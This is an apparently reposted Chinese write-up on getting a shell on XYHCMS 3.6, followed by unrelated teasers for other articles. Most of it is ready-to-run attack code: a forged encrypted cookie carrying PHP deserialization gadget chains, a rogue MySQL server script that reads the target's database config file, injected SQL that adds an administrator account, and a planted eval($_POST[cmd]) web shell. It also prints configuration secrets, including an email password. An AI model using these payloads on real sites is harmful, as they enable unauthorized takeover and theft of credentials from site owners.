xyhcms getshell

下载xyhcms3.6.2021版本并用phpstudy搭建

function get_cookie($name, $key = '') {if (!isset($_COOKIE[$name])) {return null;}$key = empty($key) ? C('CFG_COOKIE_ENCODE') : $key;$value = $_COOKIE[$name];$key = md5($key);$sc = new \Common\Lib\SysCrypt($key);$value = $sc->php_decrypt($value);return unserialize($value);
}

这里将cookie name传过来的值进行了一个解密在反序列化,
它这里会有一个随机key存放在App\Runtime\Data\668ff60dbc75e51592f9c46b573cd3eb_config目录下的site.php其中668ff60dbc75e51592f9c46b573cd3eb_config是随机生成的目录不可拆解

a:78:{s:11:"CFG_WEBNAME";s:12:"我的网站";s:10:"CFG_WEBURL";s:21:"http://www.xyhcms.com";s:12:"CFG_WEBTITLE";s:12:"我的网站";s:12:"CFG_KEYWORDS";s:12:"我的网站";s:15:"CFG_DESCRIPTION";s:0:"";s:14:"CFG_THEMESTYLE";s:7:"default";s:17:"CFG_COOKIE_ENCODE";s:9:"UQAz3abDl";s:11:"CFG_POWERBY";s:0:"";s:9:"CFG_STATS";s:0:"";s:9:"CFG_BEIAN";s:0:"";s:11:"CFG_ADDRESS";s:15:"昆明北京路";s:9:"CFG_PHONE";s:10:"0871-66666";s:17:"CFG_WEBSITE_CLOSE";b:0;s:22:"CFG_WEBSITE_CLOSE_INFO";s:36:"站点维护中,请稍等一会...";s:15:"CFG_MOBILE_AUTO";b:1;s:14:"CFG_EMAIL_FROM";s:12:"ddend@qq.com";s:19:"CFG_EMAIL_FROM_NAME";s:6:"站名";s:14:"CFG_EMAIL_HOST";s:18:"smtp.exmail.qq.com";s:14:"CFG_EMAIL_PORT";i:25;s:19:"CFG_EMAIL_LOGINNAME";s:12:"ddend@qq.com";s:18:"CFG_EMAIL_PASSWORD";s:10:"123zstQhz4";s:11:"CFG_BADWORD";s:35:"艾滋病|中国共产党|111111111";s:18:"CFG_FEEDBACK_GUEST";b:1;s:15:"CFG_MEMBER_OPEN";b:1;s:22:"CFG_MEMBER_VERIFYEMAIL";b:0;s:19:"CFG_MEMBER_NOTALLOW";s:54:"www,bbs,ftp,mail,user,users,admin,administrator,xyhcms";s:18:"CFG_UPLOAD_MAXSIZE";i:2048;s:17:"CFG_IMGTHUMB_SIZE";a:2:{i:0;s:7:"300X300";i:1;s:5:"600X0";}s:17:"CFG_IMGTHUMB_TYPE";b:0;s:18:"CFG_CLICK_NUM_INIT";i:0;s:19:"CFG_UPLOAD_ROOTPATH";s:10:"./uploads/";s:19:"CFG_UPLOAD_FILE_EXT";s:49:"jpg,gif,png,jpeg,txt,doc,docx,xls,ppt,zip,rar,mp3";s:18:"CFG_UPLOAD_IMG_EXT";s:16:"jpg,gif,png,jpeg";s:19:"CFG_VERIFY_REGISTER";b:0;s:16:"CFG_VERIFY_LOGIN";b:0;s:20:"CFG_VERIFY_GUESTBOOK";b:1;s:17:"CFG_VERIFY_REVIEW";b:1;s:16:"CFG_SQL_FILESIZE";i:5242880;s:17:"CFG_DOWNLOAD_HIDE";b:1;s:21:"CFG_MOBILE_THEMESTYLE";s:7:"default";s:14:"HOME_URL_MODEL";i:3;s:22:"HOME_URL_PATHINFO_DEPR";s:1:"/";s:18:"HOME_URL_ROUTER_ON";b:0;s:20:"HOME_URL_ROUTE_RULES";a:6:{s:7:"Mobile$";s:18:"Mobile/Index/index";s:13:"Special/:id\d";s:13:"Special/shows";s:12:"Tag/:tname\w";s:9:"Tag/shows";s:9:":e/p/:p\d";s:10:"List/index";s:8:":e/:id\d";s:10:"Show/index";s:9:"/^(\w+)$/";s:15:"List/index?e=:1";}s:18:"HOME_HTML_CACHE_ON";b:0;s:20:"MOBILE_HTML_CACHE_ON";b:0;s:19:"HTML_CACHE_INDEX_ON";b:1;s:21:"HTML_CACHE_INDEX_TIME";i:1200;s:18:"HTML_CACHE_LIST_ON";b:1;s:20:"HTML_CACHE_LIST_TIME";i:0;s:18:"HTML_CACHE_SHOW_ON";b:1;s:20:"HTML_CACHE_SHOW_TIME";i:0;s:21:"HTML_CACHE_SPECIAL_ON";b:0;s:23:"HTML_CACHE_SPECIAL_TIME";i:0;s:15:"ONLINE_CFG_MODE";b:1;s:16:"ONLINE_CFG_STYLE";s:4:"blue";s:12:"ONLINE_CFG_H";i:1;s:19:"ONLINE_CFG_H_MARGIN";i:0;s:12:"ONLINE_CFG_V";i:2;s:19:"ONLINE_CFG_V_MARGIN";i:0;s:13:"ONLINE_CFG_QQ";a:2:{s:12:"销售咨询";s:9:"307299635";s:12:"售后服务";s:9:"307299635";}s:19:"ONLINE_CFG_WANGWANG";a:1:{s:12:"在线旺旺";s:5:"7bucn";}s:19:"ONLINE_CFG_PHONE_ON";b:1;s:16:"ONLINE_CFG_PHONE";a:2:{s:12:"销售热线";s:7:"6525411";s:12:"技术支持";s:7:"6525412";}s:23:"ONLINE_CFG_GUESTBOOK_ON";s:1:"1";s:19:"ONLINE_CFG_QQ_PARAM";s:166:"<a target="_blank" href="http://wpa.qq.com/msgrd?v=3&uin=[客服号]&site=qq&menu=yes" class="xyh-online-item"><em class="xyh-online-ico-qq"> </em>[客服说明]</a>";s:25:"ONLINE_CFG_WANGWANG_PARAM";s:209:"<a target="_blank" href="http://www.taobao.com/webww/ww.php?ver=3&touid=[客服号]&siteid=cntaobao&status=1&charset=utf-8" class="xyh-online-item"><em class="xyh-online-ico-wangwang"> </em>[客服说明]</a>";s:18:"CFG_IMAGE_WATER_ON";b:0;s:20:"CFG_IMAGE_WATER_FILE";s:27:"/Data/static/picture/sy.png";s:24:"CFG_IMAGE_WATER_POSITION";i:9;s:27:"CFG_IMAGE_WATER_DIAPHANEITY";i:100;s:28:"CFG_IMAGE_WATER_IGNORE_WIDTH";s:3:"300";s:18:"CODE_SEND_INTERVAL";i:120;s:16:"CODE_SEND_EXPIRE";i:300;s:26:"ACTIVATE_SEND_EMAIL_EXPIRE";i:172800;s:11:"SMS_SDK_ALI";a:4:{s:7:"APP_KEY";s:23:"阿里短信AccessKeyID";s:10:"APP_SECRET";s:27:"阿里短信AccessKeySecret";s:9:"SIGN_NAME";s:12:"短信签名";s:8:"SEND_URL";s:29:"https://dysmsapi.aliyuncs.com";}s:14:"SMS_SDK_TPL_ID";a:4:{s:11:"com_code1_1";s:29:"阿里短信模版通用CODE1";s:11:"reg_code1_1";s:29:"阿里短信模版注册CODE2";s:13:"login_code1_1";s:29:"阿里短信模版登录CODE3";s:14:"getpwd_code1_1";s:35:"阿里短信模版找回密码CODE4";}s:23:"HTML_CACHE_RULES_COMMON";a:3:{s:11:"index:index";a:2:{i:0;s:36:"{:module}/Index_{:action}_{p|intval}";i:1;i:1200;}s:10:"list:index";a:2:{i:0;s:51:"{:module}/List/{:action}_{e}{cid|intval}_{p|intval}";i:1;i:0;}s:10:"show:index";a:2:{i:0;s:52:"{:module}/Show/{:action}_{e}{cid|intval}_{id|intval}";i:1;i:0;}}}

可以看到key为UQAz3abDl

测试加解密

<?php
class SysCrypt {
private $crypt_key;
// 构造函数
public function __construct($crypt_key) {
$this -> crypt_key = $crypt_key;
}
public function php_encrypt($txt) {
srand((double)microtime() * 1000000);
$encrypt_key = md5(rand(0,32000));
$ctr = 0;
$tmp = '';
for($i = 0;$i<strlen($txt);$i++) {
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$tmp .= $encrypt_key[$ctr].($txt[$i]^$encrypt_key[$ctr++]);
}
return base64_encode(self::__key($tmp,$this -> crypt_key));
}
public function php_decrypt($txt) {
$txt = self::__key(base64_decode($txt),$this -> crypt_key);
$tmp = '';
for($i = 0;$i < strlen($txt); $i++) {
$md5 = $txt[$i];
$tmp .= $txt[++$i] ^ $md5;
}
return $tmp;
}
private function __key($txt,$encrypt_key) {
$encrypt_key = md5($encrypt_key);
$ctr = 0;
$tmp = '';
for($i = 0; $i < strlen($txt); $i++) {
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
}
return $tmp;
}
public function __destruct() {
$this -> crypt_key = null;
}
}
/**
* 得到指定cookie的值
*
* @param string $name
*/
//function get_cookie($name, $key = '@^%$y5fbl') {
function get_cookie($name, $key = '') {
$key ='UQAz3abDl';
$value = $name;
$key = md5($key);
$sc = new SysCrypt($key);
$value = $sc->php_decrypt($value);
return unserialize($value);
}
/**
* 设置cookie
*
* @param array $args
* @return boolean
*/
//使用时修改密钥$key 涉及金额结算请重新设计cookie存储格式
//function set_cookie($args , $key = '@^%$y5fbl') {
function set_cookie($args, $key = '') {
$key ='UQAz3abDl';
$value = serialize($args);
$key = md5($key);
$sc = new SysCrypt($key);
$value = $sc->php_encrypt($value);
return $value;
//setcookie($cookieName ,$cookie, time()+3600,'/','',false);
// return setcookie($name, $value, $expire, $path, $domain, $secure); 
}
//测试加密
echo set_cookie('moonsec');
//测试解密
echo get_cookie('VCIBaVM2CmoGIQY/U2pXOQhvCXAFYAI3BnABMg==');?>

在这里插入图片描述
反序列exp读取数据库配置文件

<?php
namespace Think\Db\Driver;
use PDO;
class Mysql{
protected $options = array(
PDO::MYSQL_ATTR_LOCAL_INFILE => true
);
protected $config = array(
"dsn" => "mysql:host=192.168.0.168;dbname=xyhcms;port=3307",
"username" => "root",
"password" => "root"
);
}
namespace Think;
class Model{
protected $options = array();
protected $pk;
protected $data = array();
protected $db = null;
public function __construct(){
$this->db = new \Think\Db\Driver\Mysql();
$this->options['where'] = '';
$this->pk = 'luoke';
$this->data[$this->pk] = array(
"table" => "xyh_admin_log",
"where" => "id=0"
);
}
}
namespace Think\Session\Driver;
class Memcache{
protected $handle;
public function __construct() {
$this->handle = new \Think\Model();
}
}
namespace Think\Image\Driver;
class Imagick{
private $img;
public function __construct() {
$this->img = new \Think\Session\Driver\Memcache();
}
}
namespace Common\Lib;
class SysCrypt{
private $crypt_key;
public function __construct($crypt_key) {
$this -> crypt_key = $crypt_key;
}
public function php_encrypt($txt) {
srand((double)microtime() * 1000000);
$encrypt_key = md5(rand(0,32000));
$ctr = 0;
$tmp = '';
for($i = 0;$i<strlen($txt);$i++) {
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$tmp .= $encrypt_key[$ctr].($txt[$i]^$encrypt_key[$ctr++]);
}
return base64_encode(self::__key($tmp,$this -> crypt_key));
}
public function php_decrypt($txt) {
$txt = self::__key(base64_decode($txt),$this -> crypt_key);
$tmp = '';
for($i = 0;$i < strlen($txt); $i++) {
$md5 = $txt[$i];
$tmp .= $txt[++$i] ^ $md5;
}
return $tmp;
}
private function __key($txt,$encrypt_key) {
$encrypt_key = md5($encrypt_key);
$ctr = 0;
$tmp = '';
for($i = 0; $i < strlen($txt); $i++) {
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
}
return $tmp;
}
public function __destruct() {
$this -> crypt_key = null;
}
}
function get_cookie($name, $key = '') {
$key = 'P4tzizR6d';
$key = md5($key);
$sc = new \Common\Lib\SysCrypt($key);
$value = $sc->php_decrypt($name);
return unserialize($value);
}
function set_cookie($args, $key = '') {
$key = 'P4tzizR6d';
$value = serialize($args);
$key = md5($key);
$sc = new \Common\Lib\SysCrypt($key);
$value = $sc->php_encrypt($value);
return $value;
}$b = new \Think\Image\Driver\Imagick();
$a = set_cookie($b,'');
echo str_replace('+','%2B',$a);

利用恶意mysql读取数据库配置文件

#!/usr/bin/env python
#coding: utf8import socket
import asyncore
import asynchat
import struct
import random
import logging
import logging.handlersPORT = 3306log = logging.getLogger(__name__)log.setLevel(logging.INFO)
tmp_format = logging.handlers.WatchedFileHandler('mysql.log', 'ab')
tmp_format.setFormatter(logging.Formatter("%(asctime)s:%(levelname)s:%(message)s"))
log.addHandler(tmp_format
)filelist = (#'/etc/passwd',#'/www/wwwroot/www.xycms.com/App/Common/Conf/db.php','D:/phpstudy_pro/WWW/www.xyhcms.com/App/Common/Conf/db.php',
)#================================================
#=======No need to change after this lines=======
#================================================__author__ = 'Gifts'def daemonize():import os, warningsif os.name != 'posix':warnings.warn('Cant create daemon on non-posix system')returnif os.fork(): os._exit(0)os.setsid()if os.fork(): os._exit(0)os.umask(0o022)null=os.open('/dev/null', os.O_RDWR)for i in xrange(3):try:os.dup2(null, i)except OSError as e:if e.errno != 9: raiseos.close(null)class LastPacket(Exception):passclass OutOfOrder(Exception):passclass mysql_packet(object):packet_header = struct.Struct('<Hbb')packet_header_long = struct.Struct('<Hbbb')def __init__(self, packet_type, payload):if isinstance(packet_type, mysql_packet):self.packet_num = packet_type.packet_num + 1else:self.packet_num = packet_typeself.payload = payloaddef __str__(self):payload_len = len(self.payload)if payload_len < 65536:header = mysql_packet.packet_header.pack(payload_len, 0, self.packet_num)else:header = mysql_packet.packet_header.pack(payload_len & 0xFFFF, payload_len >> 16, 0, self.packet_num)result = "{0}{1}".format(header,self.payload)return resultdef __repr__(self):return repr(str(self))@staticmethoddef parse(raw_data):packet_num = ord(raw_data[0])payload = raw_data[1:]return mysql_packet(packet_num, payload)class http_request_handler(asynchat.async_chat):def __init__(self, addr):asynchat.async_chat.__init__(self, sock=addr[0])self.addr = addr[1]self.ibuffer = []self.set_terminator(3)self.state = 'LEN'self.sub_state = 'Auth'self.logined = Falseself.push(mysql_packet(0,"".join(('\x0a',  # Protocol'5.6.28-0ubuntu0.14.04.1' + '\0','\x2d\x00\x00\x00\x40\x3f\x59\x26\x4b\x2b\x34\x60\x00\xff\xf7\x08\x02\x00\x7f\x80\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x68\x69\x59\x5f\x52\x5f\x63\x55\x60\x64\x53\x52\x00\x6d\x79\x73\x71\x6c\x5f\x6e\x61\x74\x69\x76\x65\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x00',))            ))self.order = 1self.states = ['LOGIN', 'CAPS', 'ANY']def push(self, data):log.debug('Pushed: %r', data)data = str(data)asynchat.async_chat.push(self, data)def collect_incoming_data(self, data):log.debug('Data recved: %r', data)self.ibuffer.append(data)def found_terminator(self):data = "".join(self.ibuffer)self.ibuffer = []if self.state == 'LEN':len_bytes = ord(data[0]) + 256*ord(data[1]) + 65536*ord(data[2]) + 1if len_bytes < 65536:self.set_terminator(len_bytes)self.state = 'Data'else:self.state = 'MoreLength'elif self.state == 'MoreLength':if data[0] != '\0':self.push(None)self.close_when_done()else:self.state = 'Data'elif self.state == 'Data':packet = mysql_packet.parse(data)try:if self.order != packet.packet_num:raise OutOfOrder()else:# Fix ?self.order = packet.packet_num + 2if packet.packet_num == 0:if packet.payload[0] == '\x03':log.info('Query')filename = random.choice(filelist)PACKET = mysql_packet(packet,'\xFB{0}'.format(filename))self.set_terminator(3)self.state = 'LEN'self.sub_state = 'File'self.push(PACKET)elif packet.payload[0] == '\x1b':log.info('SelectDB')self.push(mysql_packet(packet,'\xfe\x00\x00\x02\x00'))raise LastPacket()elif packet.payload[0] in '\x02':self.push(mysql_packet(packet, '\0\0\0\x02\0\0\0'))raise LastPacket()elif packet.payload == '\x00\x01':self.push(None)self.close_when_done()else:raise ValueError()else:if self.sub_state == 'File':log.info('-- result')log.info('Result: %r', data)if len(data) == 1:self.push(mysql_packet(packet, '\0\0\0\x02\0\0\0'))raise LastPacket()else:self.set_terminator(3)self.state = 'LEN'self.order = packet.packet_num + 1elif self.sub_state == 'Auth':self.push(mysql_packet(packet, '\0\0\0\x02\0\0\0'))raise LastPacket()else:log.info('-- else')raise ValueError('Unknown packet')except LastPacket:log.info('Last packet')self.state = 'LEN'self.sub_state = Noneself.order = 0self.set_terminator(3)except OutOfOrder:log.warning('Out of order')self.push(None)self.close_when_done()else:log.error('Unknown state')self.push('None')self.close_when_done()class mysql_listener(asyncore.dispatcher):def __init__(self, sock=None):asyncore.dispatcher.__init__(self, sock)if not sock:self.create_socket(socket.AF_INET, socket.SOCK_STREAM)self.set_reuse_addr()try:self.bind(('', PORT))except socket.error:exit()self.listen(5)def handle_accept(self):pair = self.accept()if pair is not None:log.info('Conn from: %r', pair[1])tmp = http_request_handler(pair)z = mysql_listener()
# daemonize()
asyncore.loop()

python直接运行连接端口为3306

在登录之后将密文填到nickname里面就能反序列化了
添加管理员用户

namespace Think\Db\Driver;
use PDO;
class Mysql{
protected $options = array(
PDO::MYSQL_ATTR_LOCAL_INFILE => true
);
protected $config = array(
"dsn" => "mysql:host=127.0.0.1;dbname=xyhcms;port=3306",
"username" => "root",
"password" => "123456"
);
}
namespace Think;
class Model{
protected $options = array();
protected $pk;
protected $data = array();
protected $db = null;
public function __construct(){
$this->db = new \Think\Db\Driver\Mysql();
$this->options['where'] = '';
$this->pk = 'luoke';
$this->data[$this->pk] = array(
"table" => "xyh_admin_log",
"where" => "id=0;insert into www_xycms_com.xyh_admin
(id,username,password,encrypt,user_type,is_lock,login_num) VALUES
(null,'test','88bf2f72156e8e2accc2215f7a982a83','sggFkZ',9,0,4);"
);
/**test/123456**/
}
}
namespace Think\Session\Driver;
class Memcache{
protected $handle;
public function __construct() {
$this->handle = new \Think\Model();
}
}
namespace Think\Image\Driver;
class Imagick{
private $img;
public function __construct() {
$this->img = new \Think\Session\Driver\Memcache();
}
}
namespace Common\Lib;
class SysCrypt{
private $crypt_key;
public function __construct($crypt_key) {
$this -> crypt_key = $crypt_key;
}
public function php_encrypt($txt) {
srand((double)microtime() * 1000000);
$encrypt_key = md5(rand(0,32000));
$ctr = 0;
$tmp = '';
for($i = 0;$i<strlen($txt);$i++) {
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$tmp .= $encrypt_key[$ctr].($txt[$i]^$encrypt_key[$ctr++]);
}
return base64_encode(self::__key($tmp,$this -> crypt_key));
}
public function php_decrypt($txt) {
$txt = self::__key(base64_decode($txt),$this -> crypt_key);
$tmp = '';
for($i = 0;$i < strlen($txt); $i++) {
$md5 = $txt[$i];
$tmp .= $txt[++$i] ^ $md5;
}
return $tmp;
}
private function __key($txt,$encrypt_key) {
$encrypt_key = md5($encrypt_key);
$ctr = 0;
$tmp = '';
for($i = 0; $i < strlen($txt); $i++) {
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
}
return $tmp;
}
public function __destruct() {
$this -> crypt_key = null;
}
}
function get_cookie($name, $key = '') {
$key = 'UQAz3abDl';
$key = md5($key);
$sc = new \Common\Lib\SysCrypt($key);
$value = $sc->php_decrypt($name);
return unserialize($value);
}
function set_cookie($args, $key = '') {
$key = 'UQAz3abDl';
$value = serialize($args);
$key = md5($key);
$sc = new \Common\Lib\SysCrypt($key);
$value = $sc->php_encrypt($value);
return $value;
}$b = new \Think\Image\Driver\Imagick();
$a = set_cookie($b,'');
echo str_replace('+','%2B',$a);

在这里插入图片描述
成功添加用户
后台getshell

<?phpnamespace Think\Db\Driver;
use PDO;
class Mysql{
protected $options = array(
PDO::MYSQL_ATTR_LOCAL_INFILE => true
);
protected $config = array(
"dsn" => "mysql:host=127.0.0.1;dbname=xyhcms;port=3306",
"username" => "root",
"password" => "123456"
);
}
namespace Think;
class Model{
protected $options = array();
protected $pk;
protected $data = array();
protected $db = null;
public function __construct(){
$this->db = new \Think\Db\Driver\Mysql();
$this->options['where'] = '';
$this->pk = 'luoke';
$this->data[$this->pk] = array(
"table" => "xyh_admin_log",
"where" => "id=0; alter table xyh_guestbook add column `<script
language='php'>eval(\$_POST[cmd]);</script>` varchar(10);",
);
}
}
namespace Think\Session\Driver;
class Memcache{
protected $handle;
public function __construct() {
$this->handle = new \Think\Model();
}
}
namespace Think\Image\Driver;
class Imagick{
private $img;
public function __construct() {
$this->img = new \Think\Session\Driver\Memcache();
}
}
namespace Common\Lib;
class SysCrypt{
private $crypt_key;
public function __construct($crypt_key) {
$this -> crypt_key = $crypt_key;
}
public function php_encrypt($txt) {
srand((double)microtime() * 1000000);
$encrypt_key = md5(rand(0,32000));
$ctr = 0;
$tmp = '';
for($i = 0;$i<strlen($txt);$i++) {
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$tmp .= $encrypt_key[$ctr].($txt[$i]^$encrypt_key[$ctr++]);
}
return base64_encode(self::__key($tmp,$this -> crypt_key));
}
public function php_decrypt($txt) {
$txt = self::__key(base64_decode($txt),$this -> crypt_key);
$tmp = '';
for($i = 0;$i < strlen($txt); $i++) {
$md5 = $txt[$i];
$tmp .= $txt[++$i] ^ $md5;
}
return $tmp;
}
private function __key($txt,$encrypt_key) {
$encrypt_key = md5($encrypt_key);
$ctr = 0;
$tmp = '';
for($i = 0; $i < strlen($txt); $i++) {
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
}
return $tmp;
}
public function __destruct() {
$this -> crypt_key = null;
}
}
function get_cookie($name, $key = '') {
$key = 'UQAz3abDl';
$key = md5($key);
$sc = new \Common\Lib\SysCrypt($key);
$value = $sc->php_decrypt($name);
return unserialize($value);
}
function set_cookie($args, $key = '') {
$key = 'UQAz3abDl';
$value = serialize($args);
$key = md5($key);
$sc = new \Common\Lib\SysCrypt($key);
$value = $sc->php_encrypt($value);
return $value;
}
$b = new \Think\Image\Driver\Imagick();
$a = set_cookie($b,'');
echo str_replace('+','%2B',$a);?>

在后台清理缓存 访问 http://192.168.0.160//index.php?s=/Guestbook/index.html生成缓存再访问
终于进来了。
在后台清理缓存 访问 http://192.168.0.160//index.php?s=/Guestbook/index.html生成缓存再访问

http://192.168.0.160/App/Runtime/Data/3277c100b8afcccfb950d28a6ff7113c__fields/w
ww_xycms_com.xyh_guestbook.php

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/137448.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Zabbix5.0_介绍_组成架构_以及和prometheus的对比_大数据环境下的监控_网络_软件_设备监控_Zabbix工作笔记

z 这里Zabbix可以实现采集 存储 展示 报警 但是 zabbix自带的,展示 和报警 没那么好看,我们可以用 grafana进行展示,然后我们用一个叫睿象云的来做告警展示, 会更丰富一点. 可以看到 看一下zabbix的介绍. 对zabbix的介绍,这个zabbix比较适合对服务器进行监控 这个是zabbix的…

PyTorch框架中torch、torchvision、torchaudio与python之间的版本对应关系(9月最新版)

随着python语言和pytorch框架的更新&#xff0c;torch\torchvision\torchaudio与python之间的版本对应关系也在不断地更新。 最新版本torch与torchvision对应关系如下&#xff1a; 稍旧版本torch与torchvision对应关系如下&#xff1a; 最新版本torch与torchaudio对应关系如下…

计算机竞赛 深度学习 机器视觉 车位识别车道线检测 - python opencv

0 前言 &#x1f525; 优质竞赛项目系列&#xff0c;今天要分享的是 &#x1f6a9; 深度学习 机器视觉 车位识别车道线检测 该项目较为新颖&#xff0c;适合作为竞赛课题方向&#xff0c;学长非常推荐&#xff01; &#x1f947;学长这里给一个题目综合评分(每项满分5分) …

如何将视频进行分割?这几种分割方法了解一下

当我们将视频分成几段后&#xff0c;可以更好地组织和管理不同的片段&#xff0c;方便后续查找和使用。我们可以根据需要调整视频的长度和内容&#xff0c;满足不同的观看需求。此外&#xff0c;分段视频可以更好地适应不同的观看场景&#xff0c;可以更方便地分享和传播&#…

【网络协议】Http-上

Http请求结构&#xff1a; 结构图1&#xff1a; 实验解析请求报文&#xff1a; 1.在Edge浏览器上输入ip地址端口号文件资源&#xff0c;也就是下图中的120.XX.139.29:8888/A/B/c.html 2.我的程序接收到了一个没有有效载荷的http请求(呼应上面的结构图1)&#xff0c;如下 GET …

三维模型3DTile格式轻量化在数据存储的重要性分析

三维模型3DTile格式轻量化在数据存储的重要性分析 三维模型3DTile格式轻量化在数据存储中占有重要地位。随着科技的不断发展&#xff0c;尤其是空间信息科技的进步&#xff0c;人们对于三维地理空间数据的需求日益增长。然而&#xff0c;这类数据通常具有大尺度、高精度等特点&…

pip pip3安装库时都指向python2的库

当在python3的环境下使用pip3安装库时&#xff0c;发现居然都指向了python2的库 pip -V pip3 -V安装命令更改为&#xff1a; python3 -m pip install <package>

C++跳坑记:位移超出范围的处理

在C编程中&#xff0c;数据类型的选择不仅影响内存占用和性能&#xff0c;还可以对某些操作的结果产生意想不到的影响。今天&#xff0c;我将分享一个关于C在不同变量类型下位移操作结果的发现。 位移操作是C中常见的对整数的高效操作之一。然而&#xff0c;我们可能会忽视一个…

交换机端口镜像详解

交换机端口镜像是一种网络监控技术&#xff0c;它允许将一个或多个交换机端口的网络流量复制并重定向到另一个端口上&#xff0c;以便进行流量监测、分析和记录。通过端口镜像&#xff0c;管理员可以实时查看特定端口上的流量&#xff0c;以进行网络故障排查、安全审计和性能优…

docker总结

Docker实用篇 0.学习目标 1.初识Docker 1.1.什么是Docker 微服务虽然具备各种各样的优势&#xff0c;但服务的拆分通用给部署带来了很大的麻烦。 分布式系统中&#xff0c;依赖的组件非常多&#xff0c;不同组件之间部署时往往会产生一些冲突。在数百上千台服务中重复部署…

VVICAPI接口解析,实现根据ID取商品详情

VVICAPI是一个虚构的API接口名称&#xff0c;我无法提供具体的VVICAPI接口解析。但是&#xff0c;我可以向您展示一般的API接口使用方法&#xff0c;以及如何根据ID获取商品详情的示例代码。 假设您有一个名为"VVICAPI"的接口&#xff0c;并且您已经获得了访问该接口…

go语言初学(备忘)

1、安装 2 路径配置 C:\Program Files\Go\bin 3新建一个工程 4、下载VSCode 并安装插件 创建一个调试文件 在main目录下新建一个test.go脚本 package main import "fmt" func main() { fmt.Println("Hi 1111") fmt.Println("testasdf") } 断点…

【使用Cpolar将Tomcat网页传输到公共互联网上】

文章目录 1.前言2.本地Tomcat网页搭建2.1 Tomcat安装2.2 配置环境变量2.3 环境配置2.4 Tomcat运行测试2.5 Cpolar安装和注册 3.本地网页发布3.1.Cpolar云端设置3.2 Cpolar本地设置 4.公网访问测试5.结语 1.前言 Tomcat作为一个轻量级的服务器&#xff0c;不仅名字很有趣&#…

SpringBoot3基础:最简项目示例

说明 本文建立一个最基本的SpringBoot3项目&#xff0c;依赖项仅包含 spring-web&#xff08;SpringMVC&#xff09;。 备注&#xff1a;SpringBoot3需要JDK17支持&#xff0c;配置方法参考&#xff1a; SpringBoot3项目中配置JDK17 项目结构图示 POM <?xml version&qu…

解决qml编译时出现错误ninja: build stopped: subcommand failed.

qml编译时出现错误ninja: build stopped: subcommand failed. 如下图&#xff1a; 解决这个编译错误其实很简单&#xff0c;我把Window写错了&#xff0c;写成了window, 如果有类似的报错&#xff0c;可以检查一下qml代码是否有问题。当然在Qt Creator里也没有错误提示&#x…

Redis 面试常见问答

本文出自&#xff1a;https://thinkinjava.cn 作者&#xff1a;莫那 鲁道 1. 什么是缓存雪崩&#xff1f;怎么解决&#xff1f; 一般而言&#xff0c;我们会利用缓存来缓冲对数据库的冲击&#xff0c;假如缓存无法正常工作&#xff0c;所有的请求便会直接发送至数据库&#xf…

hadoop3.x搭建到集群调优

一、基础环境安装 https://blog.csdn.net/fen_dou_shao_nian/article/details/120945221 二、hadoop运行环境搭建 2.1 模板虚拟机环境准备 0&#xff09;安装模板虚拟机&#xff0c;IP 地址 192.168.10.100、主机名称 hadoop100、内存 4G、硬盘 50G 1&#xff09;hadoop100…

字符串函数

目录 一、求字符串长度 strlen 用法&#xff1a; 注意&#xff1a; 二、长度不受限制的字符串函数 strcpy 用法&#xff1a; 注意&#xff1a; strcat 用法&#xff1a; 注意&#xff1a; 用例&#xff1a; strcmp 用法&#xff1a; 三、长度受限制的字符串函数介…

QT实现钟表

1、 头文件 #ifndef MAINWINDOW_H #define MAINWINDOW_H#include <QMainWindow> #include <QPaintEvent> //绘制事件类 #include <QDebug> //信息调试类 #include <QPainter> //画家类 #include <QTimerEve…

使用Python构建强大的网络爬虫

介绍 网络爬虫是从网站收集数据的强大技术&#xff0c;而Python是这项任务中最流行的语言之一。然而&#xff0c;构建一个强大的网络爬虫不仅仅涉及到获取网页并解析其HTML。在本文中&#xff0c;我们将为您介绍创建一个网络爬虫的过程&#xff0c;这个爬虫不仅可以获取和保存网…